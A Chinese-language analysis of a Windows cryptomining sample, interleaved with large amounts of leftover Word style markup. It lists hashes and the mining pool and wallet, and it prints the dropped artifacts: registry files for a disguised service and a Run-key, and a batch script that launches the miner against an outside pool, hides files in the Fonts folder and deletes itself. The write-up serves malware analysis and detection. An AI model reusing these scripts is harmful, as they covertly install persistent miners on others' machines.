一个挖矿样本分析

@font-face{
font-family:"Times New Roman";
}

@font-face{
font-family:"宋体";
}

@font-face{
font-family:"Calibri";
}

@font-face{
font-family:"Calibri Light";
}

@list l0:level1{
mso-level-number-format:decimal;
mso-level-suffix:tab;
mso-level-text:"%1";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:21.2500pt;text-indent:-21.2500pt;font-family:‘Times New Roman‘;}

@list l0:level2{
mso-level-number-format:decimal;
mso-level-suffix:tab;
mso-level-text:"%1.%2";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:49.6000pt;text-indent:-28.3500pt;font-family:‘Times New Roman‘;}

@list l0:level3{
mso-level-number-format:decimal;
mso-level-suffix:tab;
mso-level-text:"%1.%2.%3";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:70.9000pt;text-indent:-28.3500pt;font-family:‘Times New Roman‘;}

@list l0:level4{
mso-level-number-format:decimal;
mso-level-suffix:tab;
mso-level-text:"%1.%2.%3.%4";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:99.2000pt;text-indent:-35.4000pt;font-family:‘Times New Roman‘;}

@list l0:level5{
mso-level-number-format:decimal;
mso-level-suffix:tab;
mso-level-text:"%1.%2.%3.%4.%5";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:127.5500pt;text-indent:-42.5000pt;font-family:‘Times New Roman‘;}

@list l0:level6{
mso-level-number-format:decimal;
mso-level-suffix:tab;
mso-level-text:"%1.%2.%3.%4.%5.%6";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:163.0000pt;text-indent:-56.7000pt;font-family:‘Times New Roman‘;}

@list l0:level7{
mso-level-number-format:decimal;
mso-level-suffix:tab;
mso-level-text:"%1.%2.%3.%4.%5.%6.%7";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:191.3500pt;text-indent:-63.8000pt;font-family:‘Times New Roman‘;}

@list l0:level8{
mso-level-number-format:decimal;
mso-level-suffix:tab;
mso-level-text:"%1.%2.%3.%4.%5.%6.%7.%8";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:219.7000pt;text-indent:-70.9000pt;font-family:‘Times New Roman‘;}

@list l0:level9{
mso-level-number-format:decimal;
mso-level-suffix:tab;
mso-level-text:"%1.%2.%3.%4.%5.%6.%7.%8.%9";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:255.1000pt;text-indent:-85.0000pt;font-family:‘Times New Roman‘;}

p.MsoNormal{
mso-style-name:正文;
mso-style-parent:"";
margin:0pt;
margin-bottom:.0001pt;
mso-pagination:none;
text-align:justify;
text-justify:inter-ideograph;
font-family:Calibri;
mso-fareast-font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:10.5000pt;
mso-font-kerning:1.0000pt;
}

h1{
mso-style-name:"标题 1";
mso-style-next:正文;
margin-top:17.0000pt;
margin-bottom:16.5000pt;
page-break-after:avoid;
mso-pagination:lines-together;
text-align:justify;
text-justify:inter-ideograph;
mso-outline-level:1;
line-height:240%;
font-family:Calibri;
mso-fareast-font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-weight:bold;
font-size:22.0000pt;
mso-font-kerning:22.0000pt;
}

h2{
mso-style-name:"标题 2";
mso-style-noshow:yes;
mso-style-next:正文;
margin-top:13.0000pt;
margin-bottom:13.0000pt;
page-break-after:avoid;
mso-pagination:lines-together;
text-align:justify;
text-justify:inter-ideograph;
mso-outline-level:2;
line-height:173%;
font-family:‘Calibri Light‘;
mso-fareast-font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-weight:bold;
font-size:16.0000pt;
mso-font-kerning:1.0000pt;
}

span.10{
font-family:Calibri;
}

span.15{
font-family:Calibri;
color:rgb(5,99,193);
text-decoration:underline;
text-underline:single;
}

span.16{
font-family:Calibri;
}

p.17{
mso-style-name:文档属性(绿盟科技);
mso-style-parent:文档属性标题(绿盟科技);
margin-left:2.5000pt;
mso-para-margin-left:0.5000gd;
font-family:Calibri;
mso-fareast-font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-weight:normal;
font-size:9.0000pt;
}

p.18{
mso-style-name:文档属性标题(绿盟科技);
margin:0pt;
margin-bottom:.0001pt;
font-family:Calibri;
mso-fareast-font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-weight:bold;
font-size:9.0000pt;
}

p.19{
mso-style-name:"TOC Heading";
mso-style-noshow:yes;
mso-style-parent:"标题 1";
mso-style-next:正文;
margin-top:12.0000pt;
margin-bottom:0.0000pt;
page-break-after:avoid;
mso-pagination:widow-orphan lines-together;
text-align:left;
line-height:107%;
font-family:‘Calibri Light‘;
mso-fareast-font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
color:rgb(46,117,181);
font-weight:normal;
font-size:16.0000pt;
}

p.MsoToc1{
mso-style-name:"目录 1";
mso-style-noshow:yes;
mso-style-next:正文;
margin:0pt;
margin-bottom:.0001pt;
mso-pagination:none;
text-align:justify;
text-justify:inter-ideograph;
font-family:Calibri;
mso-fareast-font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:10.5000pt;
mso-font-kerning:1.0000pt;
}

p.MsoFooter{
mso-style-name:页脚;
mso-style-noshow:yes;
margin:0pt;
margin-bottom:.0001pt;
layout-grid-mode:char;
mso-pagination:none;
text-align:left;
font-family:Calibri;
mso-fareast-font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:9.0000pt;
mso-font-kerning:1.0000pt;
}

p.MsoToc2{
mso-style-name:"目录 2";
mso-style-noshow:yes;
mso-style-next:正文;
margin-left:21.0000pt;
mso-para-margin-left:2.0000gd;
mso-pagination:none;
text-align:justify;
text-justify:inter-ideograph;
font-family:Calibri;
mso-fareast-font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:10.5000pt;
mso-font-kerning:1.0000pt;
}

p.MsoHeader{
mso-style-name:页眉;
mso-style-noshow:yes;
margin:0pt;
margin-bottom:.0001pt;
border-bottom:1.0000pt solid windowtext;
mso-border-bottom-alt:0.7500pt solid windowtext;
padding:0pt 0pt 1pt 0pt ;
layout-grid-mode:char;
mso-pagination:none;
text-align:center;
font-family:Calibri;
mso-fareast-font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:9.0000pt;
mso-font-kerning:1.0000pt;
}

span.msoIns{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:underline;
text-underline:single;
color:blue;
}

span.msoDel{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:line-through;
color:red;
}

table.MsoNormalTable{
mso-style-name:普通表格;
mso-style-parent:"";
mso-style-noshow:yes;
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-padding-alt:0.0000pt 5.4000pt 0.0000pt 5.4000pt;
mso-para-margin:0pt;
mso-para-margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-family:‘Times New Roman‘;
font-size:10.0000pt;
mso-ansi-language:#0400;
mso-fareast-language:#0400;
mso-bidi-language:#0400;
}

table.MsoTableGrid{
mso-style-name:网格型;
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-padding-alt:0.0000pt 5.4000pt 0.0000pt 5.4000pt;
mso-border-top-alt: 1px solid windowtext;
mso-border-left-alt: 1px solid windowtext;
mso-border-bottom-alt: 1px solid windowtext;
mso-border-right-alt: 1px solid windowtext;
mso-border-insideh: 1px solid windowtext;
mso-border-insidev: 1px solid windowtext;
mso-para-margin:0pt;
mso-para-margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-family:‘Times New Roman‘;
font-size:10.0000pt;
mso-ansi-language:#0400;
mso-fareast-language:#0400;
mso-bidi-language:#0400;
}
@page{mso-page-border-surround-header:no;
mso-page-border-surround-footer:no;}@page Section0{
margin-top:104.9000pt;
margin-bottom:59.5500pt;
margin-left:85.0500pt;
margin-right:85.0500pt;
size:595.3000pt 841.9000pt;
layout-grid:15.6000pt;
}
div.Section0{page:Section0;}@page Section1{
margin-top:72.0000pt;
margin-bottom:72.0000pt;
margin-left:90.0000pt;
margin-right:90.0000pt;
size:595.3000pt 841.9000pt;
layout-grid:15.6000pt;
}
div.Section1{page:Section1;}@page Section2{
margin-top:72.0000pt;
margin-bottom:72.0000pt;
margin-left:90.0000pt;
margin-right:90.0000pt;
size:595.3000pt 841.9000pt;
layout-grid:15.6000pt;
}
div.Section2{page:Section2;}

0x00 概述

本来是想分析一下Sodinokibi病毒的新的变种,但是分析了一部分,被他的混淆和循环弄得有点头疼,东西还都是压在内存里。偶然翻到几年前的一个样本分析,又重新看了一下,发现自己在逆向这块几年了,也没实质性的提升,真是光阴喂了狗。这个样本是一个挖矿样本,那时候的样本挖矿还是直接CUP干到100%,还没有后来样本那样CUP占用率可配置。整体的恶意样本思路也比较清晰就是挖矿赚钱,尽量让管理员没有办法追踪,及时定位到了恶意程序了也让他不容啥掉。

1.1 基本信息

@font-face{
font-family:"Times New Roman";
}

@font-face{
font-family:"宋体";
}

@font-face{
font-family:"Arial";
}

@font-face{
font-family:"Helvetica";
}

p.MsoNormal{
mso-style-name:正文;
mso-style-parent:"";
margin:0pt;
margin-bottom:.0001pt;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:12.0000pt;
}

p.MsoHeader{
mso-style-name:页眉;
margin:0pt;
margin-bottom:.0001pt;
border-bottom:1.0000pt solid windowtext;
mso-border-bottom-alt:0.7500pt solid windowtext;
padding:0pt 0pt 1pt 0pt ;
layout-grid-mode:char;
text-align:center;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:9.0000pt;
}

p.16{
mso-style-name:正文(绿盟科技);
margin:0pt;
margin-bottom:.0001pt;
line-height:125%;
font-family:Arial;
mso-fareast-font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:10.5000pt;
}

span.msoIns{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:underline;
text-underline:single;
color:blue;
}

span.msoDel{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:line-through;
color:red;
}

table.MsoNormalTable{
mso-style-name:普通表格;
mso-style-parent:"";
mso-style-noshow:yes;
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-padding-alt:0.0000pt 5.4000pt 0.0000pt 5.4000pt;
mso-para-margin:0pt;
mso-para-margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-family:‘Times New Roman‘;
font-size:10.0000pt;
mso-ansi-language:#0400;
mso-fareast-language:#0400;
mso-bidi-language:#0400;
}
@page{mso-page-border-surround-header:no;
mso-page-border-surround-footer:no;}@page Section0{
}
div.Section0{page:Section0;}

文件名


explorer.exe


文件大小


5455872 KB


文件MD5


721e7123e2a413fb8fd4dc6262473f57


文件SHA1


89c8b778d6f56a7974357cc104ccdcb51169d907


文件SHA256


3966f7a96536ac2435056d0860ecb8fbc3cf52f665c48fa303149bc423fe6d3a


文件CRC


70AB0903


文件类型


exe

1.2 分析环境

系统 win7 x64
软件 IDA,OD

0x01 功能描述

样本要是的功能是释放各种文件,其中包括挖矿客户端,守护程序及其他的痕迹清除,权限驻留等操作脚本。样本的目的就是给矿池wakuang.aimezi.com,钱包地址:49oJQsyUYU5GuH9hKDhdQhXvCZJT92pr27RzhmMY4uhyjSEoMXom6ciBbC4kTpwUitcXbahCuFqW6dvUr9kcBzKA8iYXics进行挖矿。

0x02 样本调试分析

1.查壳。样本没有进行加壳。

@font-face{
font-family:"Times New Roman";
}

@font-face{
font-family:"宋体";
}

@font-face{
font-family:"Arial";
}

@list l0:level1{
mso-level-number-format:decimal;
mso-level-suffix:tab;
mso-level-text:"%1)";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:21.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}

@list l0:level2{
mso-level-number-format:alpha-lower;
mso-level-suffix:tab;
mso-level-text:"%2)";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:42.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}

@list l0:level3{
mso-level-number-format:lower-roman;
mso-level-suffix:tab;
mso-level-text:"%3.";
mso-level-tab-stop:none;
mso-level-number-position:right;
margin-left:63.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}

@list l0:level4{
mso-level-number-format:decimal;
mso-level-suffix:tab;
mso-level-text:"%4.";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:84.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}

@list l0:level5{
mso-level-number-format:alpha-lower;
mso-level-suffix:tab;
mso-level-text:"%5)";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:105.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}

@list l0:level6{
mso-level-number-format:lower-roman;
mso-level-suffix:tab;
mso-level-text:"%6.";
mso-level-tab-stop:none;
mso-level-number-position:right;
margin-left:126.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}

@list l0:level7{
mso-level-number-format:decimal;
mso-level-suffix:tab;
mso-level-text:"%7.";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:147.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}

@list l0:level8{
mso-level-number-format:alpha-lower;
mso-level-suffix:tab;
mso-level-text:"%8)";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:168.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}

@list l0:level9{
mso-level-number-format:lower-roman;
mso-level-suffix:tab;
mso-level-text:"%9.";
mso-level-tab-stop:none;
mso-level-number-position:right;
margin-left:189.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}

p.MsoNormal{
mso-style-name:正文;
mso-style-parent:"";
margin:0pt;
margin-bottom:.0001pt;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:12.0000pt;
}

p.15{
mso-style-name:正文(绿盟科技);
margin:0pt;
margin-bottom:.0001pt;
line-height:125%;
font-family:Arial;
mso-fareast-font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:10.5000pt;
}

p.MsoHeader{
mso-style-name:页眉;
margin:0pt;
margin-bottom:.0001pt;
border-bottom:1.0000pt solid windowtext;
mso-border-bottom-alt:0.7500pt solid windowtext;
padding:0pt 0pt 1pt 0pt ;
layout-grid-mode:char;
text-align:center;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:9.0000pt;
}

span.msoIns{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:underline;
text-underline:single;
color:blue;
}

span.msoDel{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:line-through;
color:red;
}
@page{mso-page-border-surround-header:no;
mso-page-border-surround-footer:no;}@page Section0{
}
div.Section0{page:Section0;}

@font-face{
font-family:"Times New Roman";
}

@font-face{
font-family:"宋体";
}

@font-face{
font-family:"Arial";
}

@list l0:level1{
mso-level-number-format:decimal;
mso-level-suffix:tab;
mso-level-text:"%1)";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:21.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}

@list l0:level2{
mso-level-number-format:alpha-lower;
mso-level-suffix:tab;
mso-level-text:"%2)";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:42.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}

@list l0:level3{
mso-level-number-format:lower-roman;
mso-level-suffix:tab;
mso-level-text:"%3.";
mso-level-tab-stop:none;
mso-level-number-position:right;
margin-left:63.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}

@list l0:level4{
mso-level-number-format:decimal;
mso-level-suffix:tab;
mso-level-text:"%4.";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:84.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}

@list l0:level5{
mso-level-number-format:alpha-lower;
mso-level-suffix:tab;
mso-level-text:"%5)";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:105.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}

@list l0:level6{
mso-level-number-format:lower-roman;
mso-level-suffix:tab;
mso-level-text:"%6.";
mso-level-tab-stop:none;
mso-level-number-position:right;
margin-left:126.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}

@list l0:level7{
mso-level-number-format:decimal;
mso-level-suffix:tab;
mso-level-text:"%7.";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:147.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}

@list l0:level8{
mso-level-number-format:alpha-lower;
mso-level-suffix:tab;
mso-level-text:"%8)";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:168.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}

@list l0:level9{
mso-level-number-format:lower-roman;
mso-level-suffix:tab;
mso-level-text:"%9.";
mso-level-tab-stop:none;
mso-level-number-position:right;
margin-left:189.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}

p.MsoNormal{
mso-style-name:正文;
mso-style-parent:"";
margin:0pt;
margin-bottom:.0001pt;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:12.0000pt;
}

p.15{
mso-style-name:正文(绿盟科技);
margin:0pt;
margin-bottom:.0001pt;
line-height:125%;
font-family:Arial;
mso-fareast-font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:10.5000pt;
}

p.MsoHeader{
mso-style-name:页眉;
margin:0pt;
margin-bottom:.0001pt;
border-bottom:1.0000pt solid windowtext;
mso-border-bottom-alt:0.7500pt solid windowtext;
padding:0pt 0pt 1pt 0pt ;
layout-grid-mode:char;
text-align:center;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:9.0000pt;
}

span.msoIns{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:underline;
text-underline:single;
color:blue;
}

span.msoDel{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:line-through;
color:red;
}
@page{mso-page-border-surround-header:no;
mso-page-border-surround-footer:no;}@page Section0{
}
div.Section0{page:Section0;}

2.样本创建投放文件

对样本动态调试检测,发现样本创建并投放了5个恶意文件,其一就是创建投放conhosts.exe文件即挖矿的客户端程序。

二是创建并投放server.reg,

Server.reg内容

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ServiceMains]

"Description"="Performance library information from Windows Management Instrumentation (WMI) providers to clients on the network. This service only runs when Performance Data Helper is activated."

"DisplayName"="WMI Adapter Services"

其三是创建并投放restart.reg

restart.reg内容

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

"Tomcat"=""C:\\Windows\\system\\svchost.exe"

其四是释放恶意的csrss.exe程序,对挖矿客户端(conhosts.exe)有守护作用。

并建立了相应的注册表项

其五是创建并投放1.bat。

1.bat内容如下所示,通过1.bat的内容可以知道,脚本的作用是启动挖矿客户端,启动相关恶意程序,并完成相关脚本的删除工作。

@csrss.exe install WindowsATE conhosts -a cryptonight -o stratum+tcp://wakuang.aimezi.com:7777 -u 49oJQsyUYU5GuH9hKDhdQhXvCZJT92pr27RzhmMY4uhyjSEoMXom6ciBbC4kTpwUitcXbahCuFqW6dvUr9kcBzKA8iYXics -p x -nofee 1 -dbg -1 -t 1

@csrss.exe start WindowsATE

@C:\Windows\regedit /s server.reg

@C:\Windows\regedit /s restart.reg

@del server.reg

@del restart.reg

@attrib +s +h C:\Windows\Fonts\conhosts.exe

@attrib +s +h C:\Windows\Fonts\libcurl.dll

@attrib +s +h C:\Windows\Fonts\libeay32.dll

@attrib +s +h C:\Windows\Fonts\libgcc_s_seh-1.dll

@attrib +s +h C:\Windows\Fonts\libstdc++-6.dll

@attrib +s +h C:\Windows\Fonts\libwinpthread-1.dll

@attrib +s +h C:\Windows\Fonts\ssleay32.dll.dll

@attrib +s +h C:\Windows\Fonts\msvcr71.dll

@attrib +s +h C:\Windows\Fonts\csrss.dll

@attrib +s +h C:\Windows\Fonts\zlib1.dll

@del %0

3. 创建安装服务启动项,在逆向代码中的可以看到,安装了WindowsATE服务项。

4.清除日志操作。从样本的静态及动态分析结果来看,样本在运行的时候会执行清除日志的命令。

通过ida的静态分析也发现了相关的日志清除日志

@font-face{
font-family:"Times New Roman";
}

@font-face{
font-family:"宋体";
}

@font-face{
font-family:"Arial";
}

@list l0:level1{
mso-level-number-format:decimal;
mso-level-suffix:tab;
mso-level-text:"%1)";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:21.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}

@list l0:level2{
mso-level-number-format:alpha-lower;
mso-level-suffix:tab;
mso-level-text:"%2)";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:42.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}

@list l0:level3{
mso-level-number-format:lower-roman;
mso-level-suffix:tab;
mso-level-text:"%3.";
mso-level-tab-stop:none;
mso-level-number-position:right;
margin-left:63.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}

@list l0:level4{
mso-level-number-format:decimal;
mso-level-suffix:tab;
mso-level-text:"%4.";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:84.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}

@list l0:level5{
mso-level-number-format:alpha-lower;
mso-level-suffix:tab;
mso-level-text:"%5)";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:105.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}

@list l0:level6{
mso-level-number-format:lower-roman;
mso-level-suffix:tab;
mso-level-text:"%6.";
mso-level-tab-stop:none;
mso-level-number-position:right;
margin-left:126.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}

@list l0:level7{
mso-level-number-format:decimal;
mso-level-suffix:tab;
mso-level-text:"%7.";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:147.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}

@list l0:level8{
mso-level-number-format:alpha-lower;
mso-level-suffix:tab;
mso-level-text:"%8)";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:168.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}

@list l0:level9{
mso-level-number-format:lower-roman;
mso-level-suffix:tab;
mso-level-text:"%9.";
mso-level-tab-stop:none;
mso-level-number-position:right;
margin-left:189.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}

p.MsoNormal{
mso-style-name:正文;
mso-style-parent:"";
margin:0pt;
margin-bottom:.0001pt;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:12.0000pt;
}

p.15{
mso-style-name:正文(绿盟科技);
margin:0pt;
margin-bottom:.0001pt;
line-height:125%;
font-family:Arial;
mso-fareast-font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:10.5000pt;
}

p.MsoHeader{
mso-style-name:页眉;
margin:0pt;
margin-bottom:.0001pt;
border-bottom:1.0000pt solid windowtext;
mso-border-bottom-alt:0.7500pt solid windowtext;
padding:0pt 0pt 1pt 0pt ;
layout-grid-mode:char;
text-align:center;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:9.0000pt;
}

span.msoIns{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:underline;
text-underline:single;
color:blue;
}

span.msoDel{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:line-through;
color:red;
}
@page{mso-page-border-surround-header:no;
mso-page-border-surround-footer:no;}@page Section0{
}
div.Section0{page:Section0;}

5.启动挖矿客户端的命令行代码,矿池地址,通信端口等。 对样本进行逆向,可以看到启动客户端的地址,端口等信息。

0x03 总结

就是一个简单的挖矿样本分析,当时这个样本出现的时候,正式struts2漏洞大杀四方的时候,很多都是通过struts2漏洞进行投放的。

@font-face{
font-family:"Times New Roman";
}

@font-face{
font-family:"宋体";
}

@font-face{
font-family:"Arial";
}

p.MsoNormal{
mso-style-name:正文;
mso-style-parent:"";
margin:0pt;
margin-bottom:.0001pt;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:12.0000pt;
}

p.15{
mso-style-name:正文(绿盟科技);
margin:0pt;
margin-bottom:.0001pt;
line-height:125%;
font-family:Arial;
mso-fareast-font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:10.5000pt;
}

p.MsoHeader{
mso-style-name:页眉;
margin:0pt;
margin-bottom:.0001pt;
border-bottom:1.0000pt solid windowtext;
mso-border-bottom-alt:0.7500pt solid windowtext;
padding:0pt 0pt 1pt 0pt ;
layout-grid-mode:char;
text-align:center;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:9.0000pt;
}

span.msoIns{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:underline;
text-underline:single;
color:blue;
}

span.msoDel{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:line-through;
color:red;
}
@page{mso-page-border-surround-header:no;
mso-page-border-surround-footer:no;}@page Section0{
}
div.Section0{page:Section0;}
@font-face{
font-family:"Times New Roman";
}

@font-face{
font-family:"宋体";
}

@font-face{
font-family:"Arial";
}

p.MsoNormal{
mso-style-name:正文;
mso-style-parent:"";
margin:0pt;
margin-bottom:.0001pt;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:12.0000pt;
}

p.15{
mso-style-name:正文(绿盟科技);
margin:0pt;
margin-bottom:.0001pt;
line-height:125%;
font-family:Arial;
mso-fareast-font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:10.5000pt;
}

p.MsoHeader{
mso-style-name:页眉;
margin:0pt;
margin-bottom:.0001pt;
border-bottom:1.0000pt solid windowtext;
mso-border-bottom-alt:0.7500pt solid windowtext;
padding:0pt 0pt 1pt 0pt ;
layout-grid-mode:char;
text-align:center;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:9.0000pt;
}

span.msoIns{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:underline;
text-underline:single;
color:blue;
}

span.msoDel{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:line-through;
color:red;
}
@page{mso-page-border-surround-header:no;
mso-page-border-surround-footer:no;}@page Section0{
}
div.Section0{page:Section0;}
@font-face{
font-family:"Times New Roman";
}

@font-face{
font-family:"宋体";
}

@font-face{
font-family:"Arial";
}

@font-face{
font-family:"Consolas";
}

p.MsoNormal{
mso-style-name:正文;
mso-style-parent:"";
margin:0pt;
margin-bottom:.0001pt;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:12.0000pt;
}

p.15{
mso-style-name:正文(绿盟科技);
margin:0pt;
margin-bottom:.0001pt;
line-height:125%;
font-family:Arial;
mso-fareast-font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:10.5000pt;
}

p.MsoHeader{
mso-style-name:页眉;
margin:0pt;
margin-bottom:.0001pt;
border-bottom:1.0000pt solid windowtext;
mso-border-bottom-alt:0.7500pt solid windowtext;
padding:0pt 0pt 1pt 0pt ;
layout-grid-mode:char;
text-align:center;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:9.0000pt;
}

span.msoIns{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:underline;
text-underline:single;
color:blue;
}

span.msoDel{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:line-through;
color:red;
}
@page{mso-page-border-surround-header:no;
mso-page-border-surround-footer:no;}@page Section0{
}
div.Section0{page:Section0;}
@font-face{
font-family:"Times New Roman";
}

@font-face{
font-family:"宋体";
}

@font-face{
font-family:"Arial";
}

p.MsoNormal{
mso-style-name:正文;
mso-style-parent:"";
margin:0pt;
margin-bottom:.0001pt;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:12.0000pt;
}

p.15{
mso-style-name:正文(绿盟科技);
margin:0pt;
margin-bottom:.0001pt;
line-height:125%;
font-family:Arial;
mso-fareast-font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:10.5000pt;
}

p.MsoHeader{
mso-style-name:页眉;
margin:0pt;
margin-bottom:.0001pt;
border-bottom:1.0000pt solid windowtext;
mso-border-bottom-alt:0.7500pt solid windowtext;
padding:0pt 0pt 1pt 0pt ;
layout-grid-mode:char;
text-align:center;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:9.0000pt;
}

span.msoIns{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:underline;
text-underline:single;
color:blue;
}

span.msoDel{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:line-through;
color:red;
}
@page{mso-page-border-surround-header:no;
mso-page-border-surround-footer:no;}@page Section0{
}
div.Section0{page:Section0;}
@font-face{
font-family:"Times New Roman";
}

@font-face{
font-family:"宋体";
}

@font-face{
font-family:"Arial";
}

@font-face{
font-family:"Consolas";
}

p.MsoNormal{
mso-style-name:正文;
mso-style-parent:"";
margin:0pt;
margin-bottom:.0001pt;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:12.0000pt;
}

p.15{
mso-style-name:正文(绿盟科技);
margin:0pt;
margin-bottom:.0001pt;
line-height:125%;
font-family:Arial;
mso-fareast-font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:10.5000pt;
}

p.MsoHeader{
mso-style-name:页眉;
margin:0pt;
margin-bottom:.0001pt;
border-bottom:1.0000pt solid windowtext;
